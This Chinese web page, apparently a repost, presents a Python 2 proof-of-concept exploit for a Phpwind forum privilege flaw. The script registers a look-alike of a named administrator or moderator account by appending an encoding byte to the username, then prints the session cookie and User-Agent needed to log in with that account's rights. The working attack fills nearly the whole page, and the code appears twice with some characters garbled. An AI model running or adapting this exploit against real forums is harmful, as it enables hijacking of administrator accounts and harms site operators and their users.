本文提供了一个针对Phpwind所有版本中管理权限泄露漏洞的POC代码,演示了如何利用该漏洞创建与目标管理员相同的账户。介绍了使用方法及攻击结果。
导读:
2. import urllib2,httplib,sys
3. httplib.HTTPConnection.debuglevel = 1
4. cookies = urllib2.HTTPCookieProcessor()
5. opener = urllib2.build_opener(cookies)
6.
7.
8. def banner():
9. print ""
10. print "########################################################"
11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
12. print "Copyright (C) 2006"
13. print "jianxin@80sec.com"
14. print "80sec是一个新的致力于web安全的小团体"
15. print "http://www.80sec.com"
16.
17. def usage():
18. banner()
19. print "Usage:/n"
20. print "$ ./phpwind.py pwforumurl usertoattack/n"
21. print "pwforumurl 目标论坛地址如http://www.80sec.com/"
22. print "usertoattack 目标拥有权限的斑竹或管理员"
23. print "攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
24. print "最新版本可以使用uid登陆"
25. print "其他版本可以使用cookie+useragent登陆"
26. print "########################################################"
27. print ""
28.
29.
30. argvs=sys.argv
31. usage()
32.
33.
34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
35. pwurl = "%s/register.php" % argvs[1]
36.
37. request = urllib2.Request(
38. url = pwurl ,
39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
40. data = data)
41.
42. f=opener.open(request)
43. headers=f.headers.dict
44. cookie=headers["set-cookie"]
45. try:
46. if cookie.index('winduser'):
47. print "Exploit Success!"
48. print "Login with uid password @80sec or Cookie:"
49. print cookie
50. print "User-agent: 80sec owned this"
51. except:
52. print "Error! http://www.80sec.com"
53. print "Connect root#80sec.com"
2. import urllib2,httplib,sys
3. httplib.HTTPConnection.debuglevel = 1
4. cookies = urllib2.HTTPCookieProcessor()
5. opener = urllib2.build_opener(cookies)
6.
7.
8. def banner():
9. print ""
10. print "########################################################"
11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
12. print "Copyright (C) 2006"
13. print "jianxin@80sec.com"
14. print "80sec是一个新的致力于web安全的小团体"
15. print "http://www.80sec.com"
16.
17. def usage():
18. banner()
19. print "Usage:/n"
20. print "$ ./phpwind.py pwforumurl usertoattack/n"
21. print "pwforumurl 目标论坛地址如http://www.80sec.com/"
22. print "usertoattack 目标拥有权限的斑竹或管理员"
23. print "攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
24. print "最新版本可以使用uid登陆"
25. print "其他版本可以使用cookie+useragent登陆"
26. print "########################################################"
27. print ""
28.
29.
30. argvs=sys.argv
31. usage()
32.
33.
34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
35. pwurl = "%s/register.php" % argvs[1]
36.
37. request = urllib2.Request(
38. url = pwurl ,
39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
40. data = data)
41.
42. f=opener.open(request)
43. headers=f.headers.dict
44. cookie=headers["set-cookie"]
45. try:
46. if cookie.index('winduser'):
47. print "Exploit Success!"
48. print "Login with uid password @80sec or Cookie:"
49. print cookie
50. print "User-agent: 80sec owned this"
51. except:
52. print "Error! http://www.80sec.com"
53. print "Connect root#80sec.com"
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
